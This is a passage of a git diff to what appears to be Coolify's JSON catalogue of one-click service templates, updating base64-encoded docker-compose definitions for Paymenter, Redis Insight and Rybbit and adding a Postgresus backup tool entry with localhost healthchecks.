R0xPQkFMX1BBTEJPWF9FWFBPUlQ6P1RydWV9JwogICAgICAtICdBTExPV19HTE9CQUxfUEFMQk9YX0lNUE9SVD0ke0FMTE9XX0dMT0JBTF9QQUxCT1hfSU1QT1JUOj9GYWxzZX0nCiAgICAgIC0gJ0VRVUlQTUVOVF9EVVJBQklMSVRZX0RBTUFHRV9SQVRFPSR7RVFVSVBNRU5UX0RVUkFCSUxJVFlfREFNQUdFX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnSVRFTV9DT05UQUlORVJfRk9SQ0VfTUFSS19ESVJUWV9JTlRFUlZBTD0ke0lURU1fQ09OVEFJTkVSX0ZPUkNFX01BUktfRElSVFlfSU5URVJWQUw6PzEuMDAwMDAwfScKICAgICAgLSAnQk9YNjRfRFlOQVJFQ19TVFJPTkdNRU09JHtCT1g2NF9EWU5BUkVDX1NUUk9OR01FTTotfScKICAgICAgLSAnQk9YNjRfRFlOQVJFQ19CSUdCTE9DSz0ke0JPWDY0X0RZTkFSRUNfQklHQkxPQ0s6LX0nCiAgICAgIC0gJ0JPWDY0X0RZTkFSRUNfU0FGRUZMQUdTPSR7Qk9YNjRfRFlOQVJFQ19TQUZFRkxBR1M6LX0nCiAgICAgIC0gJ0JPWDY0X0RZTkFSRUNfRkFTVFJPVU5EPSR7Qk9YNjRfRFlOQVJFQ19GQVNUUk9VTkQ6LX0nCiAgICAgIC0gJ0JPWDY0X0RZTkFSRUNfRkFTVE5BTj0ke0JPWDY0X0RZTkFSRUNfRkFTVE5BTjotfScKICAgICAgLSAnQk9YNjRfRFlOQVJFQ19YODdET1VCTEU9JHtCT1g2NF9EWU5BUkVDX1g4N0RPVUJMRTotfScK", + "tags": null, + "category": null, + "logo": "svgs/default.webp", + "minversion": "0.0.0" + }, "paperless": { "documentation": "https://docs.paperless-ngx.com/configuration/?utm_source=coolify.io", "slogan": "Paperless-ngx is a community-supported open-source document management system that transforms your physical documents into a searchable online archive so you can keep, well, less paper.", @@ -3173,7 +3216,7 @@ "paymenter": { "documentation": "https://paymenter.org/docs/guides/docker?utm_source=coolify.io", "slogan": "Open-Source Billing, Built for Hosting", - "compose": "c2VydmljZXM6CiAgcGF5bWVudGVyOgogICAgaW1hZ2U6ICdnaGNyLmlvL3BheW1lbnRlci9wYXltZW50ZXI6bGF0ZXN0JwogICAgdm9sdW1lczoKICAgICAgLSAnYXBwX2xvZ3M6L2FwcC9zdG9yYWdlL2xvZ3MnCiAgICAgIC0gJ2FwcF9wdWJsaWM6L2FwcC9zdG9yYWdlL3B1YmxpYycKICAgIGVudmlyb25tZW50OgogICAgICBTRVJWSUNFX1VSTF9QQVlNRU5URVI6ICcke1NFUlZJQ0VfVVJMX1BBWU1FTlRFUl84MH0nCiAgICAgIERCX0RBVEFCQVNFOiAnJHtNWVNRTF9EQVRBQkFTRTotcGF5bWVudGVyLWRifScKICAgICAgREJfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgICBEQl9VU0VSTkFNRTogJyR7U0VSVklDRV9VU0VSX01ZU1FMfScKICAgICAgQVBQX0VOVjogcHJvZHVjdGlvbgogICAgICBDQUNIRV9TVE9SRTogcmVkaXMKICAgICAgU0VTU0lPTl9EUklWRVI6IHJlZGlzCiAgICAgIFFVRVVFX0NPTk5FQ1RJT046IHJlZGlzCiAgICAgIFJFRElTX0hPU1Q6IHJlZGlzCiAgICAgIFJFRElTX1VTRVJOQU1FOiBkZWZhdWx0CiAgICAgIFJFRElTX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICAgICAgREJfQ09OTkVDVElPTjogbWFyaWFkYgogICAgICBEQl9IT1NUOiBtYXJpYWRiCiAgICAgIERCX1BPUlQ6IDMzMDYKICAgICAgQVBQX0tFWTogJyR7U0VSVklDRV9CQVNFNjRfS0VZfScKICAgIGRlcGVuZHNfb246CiAgICAgIG1hcmlhZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX3N0YXJ0ZWQKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtc2YgaHR0cDovL2xvY2FsaG9zdDo4MCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwogIG1hcmlhZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6MTEnCiAgICB2b2x1bWVzOgogICAgICAtICdwYXltZW50ZXJfbWFyaWFkYl9kYXRhOi92YXIvbGliL215c3FsJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01ZU1FMX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMUk9PVH0nCiAgICAgIC0gJ01ZU1FMX0RBVEFCQVNFPSR7TVlTUUxfREFUQUJBU0U6LXBheW1lbnRlci1kYn0nCiAgICAgIC0gJ01ZU1FMX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdNWVNRTF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGhlYWx0aGNoZWNrLnNoCiAgICAgICAgLSAnLS1jb25uZWN0JwogICAgICAgIC0gJy0taW5ub2RiX2luaXRpYWxpemVkJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOmFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIHBpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMK", + "compose": "c2VydmljZXM6CiAgcGF5bWVudGVyOgogICAgaW1hZ2U6ICdnaGNyLmlvL3BheW1lbnRlci9wYXltZW50ZXI6djEuNC41JwogICAgdm9sdW1lczoKICAgICAgLSAnYXBwX2xvZ3M6L2FwcC9zdG9yYWdlL2xvZ3MnCiAgICAgIC0gJ2V4dGVuc3Rpb25zOi9hcHAvZXh0ZW5zaW9ucycKICAgICAgLSAndGhlbWVzOi9hcHAvdGhlbWVzJwogICAgICAtICdhcHBfc3RvcmFnZTovYXBwL3N0b3JhZ2UvYXBwJwogICAgICAtICdhcHBfcHVibGljX3N0b3JhZ2U6L2FwcC9zdG9yYWdlL2FwcC9wdWJsaWMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgU0VSVklDRV9VUkxfUEFZTUVOVEVSOiAnJHtTRVJWSUNFX1VSTF9QQVlNRU5URVJfODB9JwogICAgICBEQl9EQVRBQkFTRTogJyR7TVlTUUxfREFUQUJBU0U6LXBheW1lbnRlci1kYn0nCiAgICAgIERCX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMfScKICAgICAgREJfVVNFUk5BTUU6ICcke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIEFQUF9FTlY6IHByb2R1Y3Rpb24KICAgICAgQ0FDSEVfU1RPUkU6IHJlZGlzCiAgICAgIFNFU1NJT05fRFJJVkVSOiByZWRpcwogICAgICBRVUVVRV9DT05ORUNUSU9OOiByZWRpcwogICAgICBSRURJU19IT1NUOiByZWRpcwogICAgICBSRURJU19VU0VSTkFNRTogZGVmYXVsdAogICAgICBSRURJU19QQVNTV09SRDogJyR7U0VSVklDRV9QQVNTV09SRF82NF9SRURJU30nCiAgICAgIERCX0NPTk5FQ1RJT046IG1hcmlhZGIKICAgICAgREJfSE9TVDogbWFyaWFkYgogICAgICBEQl9QT1JUOiAzMzA2CiAgICAgIEFQUF9LRVk6ICcke1NFUlZJQ0VfQkFTRTY0X0tFWX0nCiAgICBkZXBlbmRzX29uOgogICAgICBtYXJpYWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9zdGFydGVkCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLXNmIGh0dHA6Ly9sb2NhbGhvc3Q6ODAgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMKICBtYXJpYWRiOgogICAgaW1hZ2U6ICdtYXJpYWRiOjExLjgnCiAgICB2b2x1bWVzOgogICAgICAtICdwYXltZW50ZXJfbWFyaWFkYl9kYXRhOi92YXIvbGliL215c3FsJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ01ZU1FMX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01ZU1FMUk9PVH0nCiAgICAgIC0gJ01ZU1FMX0RBVEFCQVNFPSR7TVlTUUxfREFUQUJBU0U6LXBheW1lbnRlci1kYn0nCiAgICAgIC0gJ01ZU1FMX1VTRVI9JHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICAtICdNWVNRTF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGhlYWx0aGNoZWNrLnNoCiAgICAgICAgLSAnLS1jb25uZWN0JwogICAgICAgIC0gJy0taW5ub2RiX2luaXRpYWxpemVkJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOmFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncmVkaXMtY2xpIHBpbmcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDFzCiAgICAgIHJldHJpZXM6IDMK", "tags": [ "automation", "billing", @@ -3375,6 +3418,19 @@ "minversion": "0.0.0", "port": "9000" }, + "postgresus": { + "documentation": "https://postgresus.com/#guide?utm_source=coolify.io", + "slogan": "Postgresus is a free, open source and self-hosted tool to backup PostgreSQL.", + "compose": "c2VydmljZXM6CiAgcG9zdGdyZXN1czoKICAgIGltYWdlOiAncm9zdGlzbGF2ZHVnaW4vcG9zdGdyZXN1czo3ZmI1OWJiNWQwMmZiYWY4NTZiMGJjZmM3YTA3ODY1NzU4MThiOTZmJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfUE9TVEdSRVNVU180MDA1CiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3VzLWRhdGE6L3Bvc3RncmVzdXMtZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXFPLScKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjQwMDUvYXBpL3YxL3N5c3RlbS9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=", + "tags": [ + "postgres", + "backup" + ], + "category": "devtools", + "logo": "svgs/postgresus.svg", + "minversion": "0.0.0", + "port": "4005" + }, "postiz": { "documentation": "https://docs.postiz.com?utm_source=coolify.io", "slogan": "Open source social media scheduling tool.", @@ -3600,7 +3656,7 @@ "redis-insight": { "documentation": "https://redis.io/docs/latest/operate/redisinsight/?utm_source=coolify.io", "slogan": "Redis Insight lets you do both GUI- and CLI-based interactions in a fully-featured desktop GUI client.", - "compose": "c2VydmljZXM6CiAgcmVkaXNpbnNpZ2h0OgogICAgaW1hZ2U6ICdyZWRpcy9yZWRpc2luc2lnaHQ6Mi43MCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1JFRElTSU5TSUdIVF81NTQwCiAgICAgIC0gUklfQVBQX0hPU1Q9MC4wLjAuMAogICAgICAtIFJJX0FQUF9QT1JUPTU1NDAKICAgICAgLSAnUklfRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1JJX0VOQ1JZUFRJT05fS0VZfScKICAgICAgLSAnUklfTE9HX0xFVkVMPSR7UklfTE9HX0xFVkVMOi1pbmZvfScKICAgICAgLSAnUklfRklMRVNfTE9HR0VSPSR7UklfRklMRVNfTE9HR0VSOi10cnVlfScKICAgICAgLSAnUklfU1RET1VUX0xPR0dFUj0ke1JJX1NURE9VVF9MT0dHRVI6LXRydWV9JwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXNfaW5zaWdodF9kYXRhOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjU1NDAnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgcmV0cmllczogMwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMK", + "compose": "c2VydmljZXM6CiAgcmVkaXNpbnNpZ2h0OgogICAgaW1hZ2U6ICdyZWRpcy9yZWRpc2luc2lnaHQ6Mi43MCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1JFRElTSU5TSUdIVF81NTQwCiAgICAgIC0gUklfQVBQX0hPU1Q9MC4wLjAuMAogICAgICAtIFJJX0FQUF9QT1JUPTU1NDAKICAgICAgLSAnUklfRU5DUllQVElPTl9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1JJX0VOQ1JZUFRJT05fS0VZfScKICAgICAgLSAnUklfTE9HX0xFVkVMPSR7UklfTE9HX0xFVkVMOi1pbmZvfScKICAgICAgLSAnUklfRklMRVNfTE9HR0VSPSR7UklfRklMRVNfTE9HR0VSOi10cnVlfScKICAgICAgLSAnUklfU1RET1VUX0xPR0dFUj0ke1JJX1NURE9VVF9MT0dHRVI6LXRydWV9JwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXNfaW5zaWdodF9kYXRhOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHdnZXQKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vMC4wLjAuMDo1NTQwL2FwaS9oZWFsdGgnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgcmV0cmllczogMwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMK", "tags": [ "redis", "gui", @@ -3664,7 +3720,7 @@ "rybbit": { "documentation": "https://rybbit.io/docs?utm_source=coolify.io", "slogan": "Open-source, privacy-first web analytics.", - "compose": "c2VydmljZXM6CiAgcnliYml0OgogICAgaW1hZ2U6ICdnaGNyLmlvL3J5YmJpdC1pby9yeWJiaXQtY2xpZW50OnYxLjYuMScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1JZQkJJVF8zMDAyCiAgICAgIC0gTk9ERV9FTlY9cHJvZHVjdGlvbgogICAgICAtICdORVhUX1BVQkxJQ19CQUNLRU5EX1VSTD0ke1NFUlZJQ0VfVVJMX1JZQkJJVH0nCiAgICAgIC0gJ05FWFRfUFVCTElDX0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9TSUdOVVA6LWZhbHNlfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcnliYml0X2JhY2tlbmQKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnbmMgLXogMTI3LjAuMC4xIDMwMDInCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICByeWJiaXRfYmFja2VuZDoKICAgIGltYWdlOiAnZ2hjci5pby9yeWJiaXQtaW8vcnliYml0LWJhY2tlbmQ6djEuNi4xJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTk9ERV9FTlY9cHJvZHVjdGlvbgogICAgICAtIFRSVVNUX1BST1hZPXRydWUKICAgICAgLSAnQkFTRV9VUkw9JHtTRVJWSUNFX1VSTF9SWUJCSVR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnQkVUVEVSX0FVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfNjRfQkFDS0VORH0nCiAgICAgIC0gJ0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnRElTQUJMRV9URUxFTUVUUlk9JHtESVNBQkxFX1RFTEVNRVRSWTotdHJ1ZX0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfSE9TVD1odHRwOi8vcnliYml0X2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7Q0xJQ0tIT1VTRV9VU0VSOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9EQj0ke0NMSUNLSE9VU0VfREI6LWFuYWx5dGljc30nCiAgICAgIC0gUE9TVEdSRVNfSE9TVD1yeWJiaXRfcG9zdGdyZXMKICAgICAgLSBQT1NUR1JFU19QT1JUPTU0MzIKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgZGVwZW5kc19vbjoKICAgICAgcnliYml0X2NsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcnliYml0X3Bvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAxL2FwaS9oZWFsdGgnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICByeWJiaXRfcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE3LjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgcnliYml0X2NsaWNraG91c2U6CiAgICBpbWFnZTogJ2NsaWNraG91c2UvY2xpY2tob3VzZS1zZXJ2ZXI6MjUuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1hbmFseXRpY3N9JwogICAgICAtICdDTElDS0hPVVNFX1VTRVI9JHtDTElDS0hPVVNFX1VTRVI6LWRlZmF1bHR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZycKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgdm9sdW1lczoKICAgICAgLSAnY2xpY2tob3VzZV9kYXRhOi92YXIvbGliL2NsaWNraG91c2UnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2VuYWJsZV9qc29uLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9lbmFibGVfanNvbi54bWwKICAgICAgICBjb250ZW50OiAiPGNsaWNraG91c2U+XG4gICAgPHNldHRpbmdzPlxuICAgICAgICA8ZW5hYmxlX2pzb25fdHlwZT4xPC9lbmFibGVfanNvbl90eXBlPlxuICAgIDwvc2V0dGluZ3M+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2NsaWNraG91c2Utc2VydmVyL2NvbmZpZy5kL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgY29udGVudDogIjxjbGlja2hvdXNlPlxuICAgIDxsb2dnZXI+XG4gICAgICAgIDxsZXZlbD53YXJuaW5nPC9sZXZlbD5cbiAgICAgICAgPGNvbnNvbGU+dHJ1ZTwvY29uc29sZT5cbiAgICA8L2xvZ2dlcj5cbiAgICA8cXVlcnlfdGhyZWFkX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHF1ZXJ5X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRleHRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8dHJhY2VfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8bWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGFzeW5jaHJvbm91c19tZXRyaWNfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8c2Vzc2lvbl9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxwYXJ0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGxhdGVuY3lfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cHJvY2Vzc29yc19wcm9maWxlX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG48L2NsaWNraG91c2U+IgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlX2NvbmZpZy9uZXR3b3JrLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9uZXR3b3JrLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8bGlzdGVuX2hvc3Q+MC4wLjAuMDwvbGlzdGVuX2hvc3Q+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL3VzZXJfbG9nZ2luZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvY29uZmlnLmQvdXNlcl9sb2dnaW5nLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8cHJvZmlsZXM+XG4gICAgICAgIDxkZWZhdWx0PlxuICAgICAgICAgICAgPGxvZ19xdWVyaWVzPjA8L2xvZ19xdWVyaWVzPlxuICAgICAgICAgICAgPGxvZ19xdWVyeV90aHJlYWRzPjA8L2xvZ19xdWVyeV90aHJlYWRzPlxuICAgICAgICAgICAgPGxvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPjA8L2xvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPlxuICAgICAgICA8L2RlZmF1bHQ+XG4gICAgPC9wcm9maWxlcz5cbjwvY2xpY2tob3VzZT4iCg==", + "compose": "c2VydmljZXM6CiAgcnliYml0OgogICAgaW1hZ2U6ICdnaGNyLmlvL3J5YmJpdC1pby9yeWJiaXQtY2xpZW50OnYxLjYuMScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfVVJMX1JZQkJJVF8zMDAyCiAgICAgIC0gTk9ERV9FTlY9cHJvZHVjdGlvbgogICAgICAtICdORVhUX1BVQkxJQ19CQUNLRU5EX1VSTD0ke1NFUlZJQ0VfVVJMX1JZQkJJVH0nCiAgICAgIC0gJ05FWFRfUFVCTElDX0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9TSUdOVVA6LWZhbHNlfScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcnliYml0X2JhY2tlbmQKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnbmMgLXogMTI3LjAuMC4xIDMwMDInCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICByeWJiaXRfYmFja2VuZDoKICAgIGltYWdlOiAnZ2hjci5pby9yeWJiaXQtaW8vcnliYml0LWJhY2tlbmQ6djEuNi4xJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gTk9ERV9FTlY9cHJvZHVjdGlvbgogICAgICAtIFRSVVNUX1BST1hZPXRydWUKICAgICAgLSAnQkFTRV9VUkw9JHtTRVJWSUNFX1VSTF9SWUJCSVR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnQkVUVEVSX0FVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfNjRfQkFDS0VORH0nCiAgICAgIC0gJ0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnRElTQUJMRV9URUxFTUVUUlk9JHtESVNBQkxFX1RFTEVNRVRSWTotdHJ1ZX0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfSE9TVD1odHRwOi8vcnliYml0X2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7Q0xJQ0tIT1VTRV9VU0VSOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9EQj0ke0NMSUNLSE9VU0VfREI6LWFuYWx5dGljc30nCiAgICAgIC0gUE9TVEdSRVNfSE9TVD1yeWJiaXRfcG9zdGdyZXMKICAgICAgLSBQT1NUR1JFU19QT1JUPTU0MzIKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgZGVwZW5kc19vbjoKICAgICAgcnliYml0X2NsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcnliYml0X3Bvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAxL2FwaS9oZWFsdGgnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdG